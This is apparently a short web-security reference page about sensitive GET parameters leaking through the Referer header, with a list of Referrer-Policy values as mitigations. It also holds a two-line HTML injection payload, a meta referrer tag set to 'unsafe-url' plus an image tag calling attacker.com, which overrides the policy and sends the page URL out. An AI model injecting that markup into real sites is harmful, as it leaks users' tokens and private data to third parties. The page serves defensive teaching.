Referrer is the header used by browsers to indicate which was the previous page visited.
Sensitive information leaked
If at some point inside a web page any sensitive information is located on a GET request parameters, if the page contains links to external sources or an attacker is able to make/suggest (social engineering) the user visit a URL controlled by the attacker. It could be able to exfiltrate the sensitive information inside the latest GET request.
Mitigation
You can make the browser follow a Referrer-policy that could avoid the sensitive information to be sent to other web applications:
1
Referrer-Policy: no-referrer
2
Referrer-Policy: no-referrer-when-downgrade
3
Referrer-Policy: origin
4
Referrer-Policy: origin-when-cross-origin
5
Referrer-Policy: same-origin
6
Referrer-Policy: strict-origin
7
Referrer-Policy: strict-origin-when-cross-origin
8
Referrer-Policy: unsafe-url
Copied!
Counter-Mitigation
You can override this rule using an HTML meta tag (the attacker needs to exploit and HTML injection):
1
<metaname="referrer"content="unsafe-url">
2
<imgsrc="https://attacker.com">
Copied!
Defense
Never put any sensitive data inside GET parameters or paths in the URL.